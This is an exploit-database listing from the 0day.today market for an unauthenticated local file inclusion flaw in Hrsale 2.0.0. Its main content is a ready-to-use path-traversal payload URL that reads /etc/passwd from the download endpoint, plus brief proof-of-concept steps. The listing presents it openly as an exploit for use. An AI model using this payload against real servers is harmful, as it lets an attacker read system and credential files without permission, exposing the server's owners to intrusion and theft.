[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Hrsale 2.0.0 - Local File Inclusion Vulnerability

Author
Sosecure
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-35087
Category
web applications
Date add
22-10-2020
Platform
php
# Exploit Title: Hrsale 2.0.0 - Local File Inclusion
# Exploit Author: Sosecure
# Vendor Homepage: https://hrsale.com/index.php
# Version: version 2.0.0

Description:
This exploit allow you to download any readable file from server with out permission and login session.

Payload :
           https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
POC:

  1.  Access to HRsale application and browse to download path with payload
  2.  Get /etc/passwd

#  0day.today [2024-11-15]  #